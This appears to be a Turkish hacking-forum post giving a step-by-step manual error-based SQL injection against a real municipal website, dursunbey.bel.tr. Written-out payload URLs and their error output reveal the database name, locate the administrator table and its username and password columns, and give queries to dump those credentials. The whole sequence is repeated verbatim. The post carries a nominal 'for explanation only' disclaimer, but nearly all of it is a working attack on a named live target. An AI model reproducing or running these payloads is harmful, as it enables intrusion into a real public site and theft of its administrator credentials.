[size=xx-large][font=Courier New, Courier, monospace]TÜRK SİTESİ PAYLAŞMAK FORUM[size=xx-large]UMUZDA YASAKTIR [/font][/size][/size]
Dursunbey.bel.tr Manuel Sql İnjection
- Konbuyu başlatan Scorpiol
- Başlangıç tarihi
Bakalım
Yeniler Bakabilir. Linklere Kopyalayıp Ne Yaptıgımı Görebilirsiniz. Not= Türk Sitelerinde Denemeyin Anlatım Amaçlıdır.
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
Duplicate entry '5.6.41:1' for key 'group_key' (version)
----------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'kwwdursu_belediye~1' for key 'group_key' ( Database ismi)
-----------------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'mia_yonetici~1' for key 'group_key'
db isminin içine girdik şimdi bunlardan tables bulucaz oda LIMIT+0,1 olan yerı 0 ı 1 2 3 4 5 6 dıye veya -1 -2 -3 -4 dıye deiştircez bu ne diye sorucaksanız bunuz yaptıgımzıda tablesleri sırasıyla bıze cıkartıcak dogru olanu bulucaz yani adminle alakalı dogru olan LIMIT+23,1 bu bıze mia_yonetici dıye cıkarttı
--------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x6d69615f796f6e6574696369+AND+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
yukarda yaptıgımız 1 2 3 4 5 dıye lazım olan tables ı aynısnı columns dada yapıcaz
LIMIT+1,1), de bıze = Duplicate entry 'k_adi~1' for key 'group_key'
LIMIT+2,1) de bize = Duplicate entry 'sifre~1' for key 'group_key'
yanı k_adi ve sifre diye dump edıcez
---------------
şifresi
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(sifre)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
kullanıcı adı
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(k_adi)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
bunlarıda tekrar tables ve columnsa yaptıgımız gıbi deiştircez örnek LIMIT+1,1 LIMIT+2,1 LIMIT+3,1 dıye
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
Duplicate entry '5.6.41:1' for key 'group_key' (version)
----------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'kwwdursu_belediye~1' for key 'group_key' ( Database ismi)
-----------------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'mia_yonetici~1' for key 'group_key'
db isminin içine girdik şimdi bunlardan tables bulucaz oda LIMIT+0,1 olan yerı 0 ı 1 2 3 4 5 6 dıye veya -1 -2 -3 -4 dıye deiştircez bu ne diye sorucaksanız bunuz yaptıgımzıda tablesleri sırasıyla bıze cıkartıcak dogru olanu bulucaz yani adminle alakalı dogru olan LIMIT+23,1 bu bıze mia_yonetici dıye cıkarttı
--------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x6d69615f796f6e6574696369+AND+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
yukarda yaptıgımız 1 2 3 4 5 dıye lazım olan tables ı aynısnı columns dada yapıcaz
LIMIT+1,1), de bıze = Duplicate entry 'k_adi~1' for key 'group_key'
LIMIT+2,1) de bize = Duplicate entry 'sifre~1' for key 'group_key'
yanı k_adi ve sifre diye dump edıcez
---------------
şifresi
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(sifre)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
kullanıcı adı
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(k_adi)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
bunlarıda tekrar tables ve columnsa yaptıgımız gıbi deiştircez örnek LIMIT+1,1 LIMIT+2,1 LIMIT+3,1 dıye